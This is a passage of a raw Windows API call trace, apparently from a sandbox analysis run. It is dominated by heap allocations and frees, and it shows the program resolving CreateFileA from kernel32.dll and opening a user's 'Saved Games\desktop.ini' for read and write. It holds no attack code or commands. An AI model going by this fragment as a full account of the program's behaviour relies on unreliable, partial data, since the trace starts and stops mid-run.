(HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0191.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0191.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0191.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0191.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0191.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0191.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0191.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0191.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0191.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0191.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0191.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0191.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0191.923] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0191.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0191.924] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0191.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0191.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0191.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0191.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0191.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0191.924] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0191.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0191.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0191.924] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0191.924] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0191.924] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0191.924] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0191.924] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0191.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0191.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0191.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0191.924] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0191.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0191.924] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0191.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0191.924] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0191.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0191.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0191.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0191.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0191.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0191.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0191.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0191.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0191.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0191.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0191.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0191.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0191.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0191.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0191.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0191.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba378 [0191.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0191.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0191.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0191.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0191.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0191.925] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0191.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0191.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0191.925] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0191.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0191.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c88 [0191.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0191.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0191.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1990 [0191.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0191.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1990 [0191.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0191.926] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0191.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0191.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0191.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0191.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0191.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0191.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0191.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0191.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0191.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0191.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0191.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0191.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0191.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0191.926] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0191.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0191.926] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0191.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0191.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0191.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0191.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0191.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0191.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0191.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0191.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0191.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0191.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0191.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0191.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0191.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0191.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0191.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0191.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0191.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0191.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0191.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0191.927] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0191.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0191.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0191.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0191.927] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0191.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0191.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0191.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0191.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0191.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0191.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0191.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0191.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0191.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0191.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0191.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0191.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0191.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0191.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0191.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0191.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0191.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0191.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0191.928] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0191.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0191.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0191.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0191.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0191.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0191.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0191.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0191.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0191.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0191.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0191.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0191.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0191.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0191.929] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0191.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0191.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0191.929] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0191.929] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9bd4b0 [0191.929] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9bd4b0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0191.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0191.930] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0191.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0191.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0191.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0191.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0191.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0191.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0191.930] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0191.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd4b0 [0191.930] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9bd4b0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0191.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0191.930] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0191.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0191.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0191.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0191.930] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0191.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0191.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0191.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0191.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0191.930] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0191.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0191.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0191.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0191.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0xbca008 [0191.931] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\desktop.ini", cchWideChar=54, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0191.931] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x36) returned 0x90ad98 [0191.931] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\desktop.ini", cchWideChar=54, lpMultiByteStr=0x90ad98, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\desktop.ini", lpUsedDefaultChar=0x0) returned 54 [0191.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0191.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0191.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0191.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0191.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0191.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0191.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0191.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0191.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0191.931] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\saved games\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0191.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0191.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0191.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0191.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0191.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0191.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0191.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0191.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0191.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0191.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0191.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0191.935] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0191.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0191.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0191.936] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=54, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 54 [0191.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x6c) returned 0x906f38 [0191.936] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=54, lpWideCharStr=0x906f38, cchWideChar=54 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\desktop.ini") returned 54 [0191.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0191.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x8fecd8 [0191.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0191.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0191.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0191.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0191.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0191.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0191.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0191.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0191.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0191.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0191.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0191.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0191.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0191.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0191.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0191.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0191.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0191.936] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0191.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0191.937] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0191.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0191.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0191.937] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0191.937] 